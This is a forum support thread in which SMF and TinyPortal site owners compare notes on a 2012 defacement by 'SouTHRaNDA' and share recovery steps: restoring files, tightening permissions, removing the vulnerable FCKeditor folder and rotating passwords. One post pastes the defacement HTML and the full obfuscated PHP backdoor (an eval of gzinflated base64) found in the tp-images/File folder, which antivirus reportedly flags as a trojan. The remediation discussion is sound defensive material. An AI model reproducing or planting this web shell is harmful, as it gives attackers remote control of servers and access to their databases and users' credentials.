Could anyone give me advice on how to recover from a hack by SouTHRaNDA wAs HeRE I am using linux and apache and SMF 2.0 RC5
Not sure if the hack was into linux or SMF but my SMF index.php was changed. but installing a new version does not help
More details of what I am using available if needed
there are several security issues with RC5, i would suggest you contact your host and upgrade to 2.0.2
Hi,
I had the exact same issue with two older SMF sites today.
Best way to fix is:
a) restore index.php and Settings.php from last backup (you should always run backups!)
b) make sure your index.php and Settings.php are NOT world/group writable!
c) make sure your /tp-images folder is NOT world/group writable!
d) remove the directory "File" from /tp-images (that's where they seem to break in)
e) by all means CHANGE your database and administrator passwords (part of the hack is them trying to pull a dump of your members table!)
That should clear it. Most important thing is indeed they must not be able to use php code to overwrite your index.php and Settings.php - depends on your hosts setup if and how they can achieve that.
Regards,
Jerry
Quote from: sonnenblende on January 03, 2012, 01:07:33 PM
Hi,
I had the exact same issue with two older SMF sites today.
Best way to fix is:
a) restore index.php and Settings.php from last backup (you should always run backups!)
b) make sure your index.php and Settings.php are NOT world/group writable!
c) make sure your /tp-images folder is NOT world/group writable!
d) remove the directory "File" from /tp-images (that's where they seem to break in)
e) by all means CHANGE your database and administrator passwords (part of the hack is them trying to pull a dump of your members table!)
That should clear it. Most important thing is indeed they must not be able to use php code to overwrite your index.php and Settings.php - depends on your hosts setup if and how they can achieve that.
Regards,
Jerry
I should note that I fixed the security issue with tp-images/ folder back in TP 1 rc1.2. If you are not running TP on or after that version you are vulnerable.
I have checked and made sure I have it all set as you suggest, I did have an old version of TP, I am not using it but the directories and files are there, So I will sort that. I don't however have a file directory under tp-images, so I would guess they broke in some other way.
Do you know if this hack does get them the members table? I will email all the members anyway
Thanks for the help
If any hacker gains access to your files system, you can count on them getting database access from your Settings.php file. There have only been two security exploits to TinyPortal that I can recall. One that I fixed that I mentioned in RC1.2. And the other one was from the FCKeditor that was exploited when TinyPortal included that as part of it's code. If you have such an old version that still has the FCKeditor folder in it, I'd highly suggest you remove it or update your mod install.
I wanted to add a couple of things to this thread based on my experience this morning with this. After overwriting my settings file and index file I still had to overwrite my SSI file as well.
At that point I looked into my Packages for updates of my forum. I was informed I was running an outdated forum version.
I had 1.1.15 and needed to update to 1.1.16
In my attempt, two PHP files failed in my Sources folder, Packages.php and MessageIndex.php
So i overwrote those from the same back up I had prior to getting hacked - reran the update test and both then passed with success and I updated. I then went and changed my admin PW and my database PW
Looks like I am back up and running, and all seems good.
Final thoughts, are that I think you would need to also fix those two other PHP files in the Sources folder as they are somehow affected by the hack. I see no other way since the update passed after I fixed them from a recent backup.
Oh another note: Checking into my "File" folder in tp-images I saw a list of crazy html pages.
So I think that the goal is to shut your site down, harvest emails and host their own webpages containing whatever was on them. I did not want to visit any of the sites, just move on with my life.
Good luck and hope you do not have to deal with this - its a waste of a couple of hours of your life but at least it appears to be recoverable...
does anyone know how it actually works?
is it the SMF code it exploits? does the new patch fix it?
or could it be a mod? i have tiny portal
i was also hacked and im doing a full restore just to be safe, but while its running i dont want to be hacked again (i put forum into maintnance mode, but i dont know if that will stop it)
full restore is taking forever ;()
has anyone been hacked again since updating? do they get member passwords or anything?
wow on another note it took me about 12-13 'new images' before i could possibly comprehend the verification image... wtf?
this was an issue in tinyportal as ichbin posted, if there were further issues related to this it would have been posted in the tinyportal support thread.
when i try to upgrade to 1.1.16 from 1.1.15 it says:
The package you are trying to download or install is either corrupt or not compatible with this version of SMF
if you do a search on the forum for that message you will find the fix it has been posted several times.
any more direction than that? because i DID do a search, i found TONS Of posts, and most of them either saying, it doesnt work, or it did work
a few say rezip it, which i tried, that didnt work
theres gotta be more help out there than "it works" "it doesnt work" "i rezipped it"
because that is really not very useful
@ Intangir - Did you get that message after clicking on the link in the admin center? If you did, try downloading the update file from here > http://custom.simplemachines.org/mods/downloads/smf_patch_1.0.22_1.1.16.tar.gz and install it like a mod with the Package Manager.
Son of a **** I got hit with this today.....
Quote from: slvreagl on April 08, 2012, 11:53:23 PM
Son of a **** I got hit with this today.....
So I did the above recommendations and found my SSi.php was also attacked, after deleting and restoring all three files from a known good backup I am back up and running and my database was not affected (I use a different password for database access) They attacked via FTP and simply overwrote my files that were writable *stupid mistake! Not sure how they got my ftp password but they have all been changed.
Also should also note I got attacked running SMF 2.0.2 and TinyPortal 1.107
Quote from: slvreagl on April 09, 2012, 10:11:39 PM
Not sure how they got my ftp password but they have all been changed.
Very easily if you have spyware on any PC used to administratively access your site. With a keystroke logger or password sniffer, a hacker knows your new password as soon as you type it in. Be sure to do a thorough spyware scan on your PC(s), and to change passwords again if the scan reveals any spyware. And of course, you have a firewall to stop unauthorized data transfers (such as sending out a captured password), right?
Note that ftp sends its password in clear text. That can be another route for grabbing your password. You may want to ask your host if they support SFTP (encrypted) file transfer.
Quote
Also should also note I got attacked running SMF 2.0.2 and TinyPortal 1.107
Probably irrelevant information, if they got in by knowing your FTP password.
Quote from: slvreagl on April 09, 2012, 10:11:39 PM
So I did the above recommendations and found my SSi.php was also attacked, after deleting and restoring all three files from a known good backup I am back up and running and my database was not affected (I use a different password for database access) They attacked via FTP and simply overwrote my files that were writable *stupid mistake! Not sure how they got my ftp password but they have all been changed.
Also should also note I got attacked running SMF 2.0.2 and TinyPortal 1.107
A couple of things to note. If you are on shared hosting, it often happens that a hacker can compromise another site on the same server that you are on, which then gives them access to the rest of the sites on the server because the host doesn't have everything properly configured.
It's best to fill out a security report and to provide ALL the information asked for on that form.
http://www.simplemachines.org/about/smf/security.php
Blah, this bastard got me too :o
Downloading my backup from 5 days ago, gonna take a bit since its 300 GB.... LMFAO
You should keep an eye on this topic too Anubis.
http://www.simplemachines.org/community/index.php?topic=466873.msg3311171#msg3311171
Thanks Brad, think I did remove the FCKeditor when I read about the vulnerability in the past.
Also noticed this hacker added 404.php files in a few folders (so others might want to look for that as well)
- Root
- Themes
- Sources
I already cleared these files from my server, and I didn't save them (so I can't post them up)
I was hacked also, but have followed the above advice and hopefully it will be ok now! keeping watch on this thread, if any more great advice pops up, I will be heeding it for sure.
In case anyone was wondering this is the code on all three files that where hacked on my site, Index.php, Settings.php, SSI.php
<html>
<head>
<meta content="DiRTY SouTH" name="copyright">
<meta content="southranda, dirty south, southranda was here" name="keywords">
<meta content="SouTHRaNDA wAs HeRE" name="description">
<title>by SouTHRaNDA</title>
<link href="http://i.lulzimg.com/9b7d4026e6.gif" rel="shortcut icon">
</head>
<body bgcolor="#ffffff" text="#a9a9a9" onmousedown="return false;" onkeydown="return false;" oncontextmenu="return false;">
<br>
<div align="center">
<br>
<b>SouTHRaNDA wAs HeRE</b><br><br><i>con gli occhi rossi</i><br>
<br>
<img src="http://i.imgur.com/QmRje.jpg">
<br>
<br>
<i>porta droga<br><br>bianca vergine pura<br><br>toglimi la paura</i><br><br><br>© <b>DiRTY SouTH</b><br>
<br>
<br>
<embed src="http://www.youtube.com/v/oij0kscC2Yc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
</div>
</body>
</html>
Also found and deleted the directory tp-images/File
with the following files:
weba.php.pjpg
index.php
<?php /*00000000000000000000000000000000*/ eval(gzinflate(base64_decode('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')));?>
<?php
exit;
?>
21032012.html
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1251">
</head>
<body>
21_03_2012 01
</body>
</html>
Quote from: Lord Anubis on April 10, 2012, 04:37:44 PM
Thanks Brad, think I did remove the FCKeditor when I read about the vulnerability in the past.
Also noticed this hacker added 404.php files in a few folders (so others might want to look for that as well)
- Root
- Themes
- Sources
I already cleared these files from my server, and I didn't save them (so I can't post them up)
I found one of these files in my root folder. Not sure if you guys want me to upload it here? or just delete it. I haven't checked my SSI file, but I will today.
So i downloaded the tp-images/File to my desktop to take a look at the files AVG popped up with 2
"Trojan horse PHP/BackDoor.BH"
"Trojan horse PHP/BackDoor.Cp"
files found...... so this looks like one way they are getting in.
For those of you running TinyPortal make sure you are running the latest version. If you have any previous older install of TP on your forum, make sure you remove the FCKEditor folder.
Has anyone contacted their host to get help with their problem?
Quote from: IchBin™ on April 12, 2012, 05:27:15 PM
For those of you running TinyPortal make sure you are running the latest version. If you have any previous older install of TP on your forum, make sure you remove the FCKEditor folder.
Has anyone contacted their host to get help with their problem?
I contacted godaddy today, and purchased their security app, and submitted a ticket with all the problems that I had.
One thing that really annoyed me was that southranda took over my profile on my forum, and I had to come on as another admin and delete myself in order to delete him. I was panicked, probably not the best choice, but I still have my forum in tact.
I also submitted a report here with all the info they required (i think). Hopefully we'll get to the bottom of this soon.
BTW, I did delete the FCKeditor and the file in tp-images, and updated TP.
EDIT:
Quote from: GoDaddy support
Dear Sir/Madam,
Thank you for contacting the Website Protection Customer Security Advisors. We understand that your site recently was attacked and defaced by an attacker. From a review of the site logs, it appears that a vulnerable version of FCKeditor was used in order to upload a malicious file to the hosting plan on 4/9/12. Using this malicious file, the attacker was able to upload additional malicious files as well as modify your index page. At this time it does appear that you have already removed the FCKeditor folder as well as the malicious files the attacker was able to upload. A sample of logs has been provided and as can be seen from the logs, the attacker was able to read your configuration file in order to gain your database password. The attacker appears to have made a connection to the database and it's possible that changes could have been made to the database or content copied from the database. You will want to ensure that your users all update their login information to the site as well as ensure that they update their passwords on other sites if they use the same password for multiple websites. As a precaution you may wish to restore your database prior to 4/9/12 if you have a backup of the database that you can verify is clean.
If you did indeed had the FCKeditor folder, and were using TP prior to version 1RC1.2, then I'm pretty sure that was your problem. tp-images/ folder now has a .htaccess file to prevent files from being executed in it, and also TP should not allow anything but images to be uploaded to the directory.
FCKEditor had a file upload exploit that allowed exactly the same problem you have experienced.
Quote from: IchBin™ on April 12, 2012, 08:48:13 PM
If you did indeed had the FCKeditor folder, and were using TP prior to version 1RC1.2, then I'm pretty sure that was your problem. tp-images/ folder now has a .htaccess file to prevent files from being executed in it, and also TP should not allow anything but images to be uploaded to the directory.
FCKEditor had a file upload exploit that allowed exactly the same problem you have experienced.
Yep I had that folder, and the TP version was 1.104. I've got it all correct now. I wish I had deleted it earlier!
Oh it was weird that the hacker himself deleted the FCKeditor from my site. I thought that was weird, like he closed the door behind him, so no one else could break in?
haha, maybe so. But yeah, that is definitely weird.
Quote from: TeaTephi on April 12, 2012, 09:20:22 PM
Oh it was weird that the hacker himself deleted the FCKeditor from my site. I thought that was weird, like he closed the door behind him, so no one else could break in?
It's not the first time that's been done. I seem to recall hearing of viruses that disable competing viruses.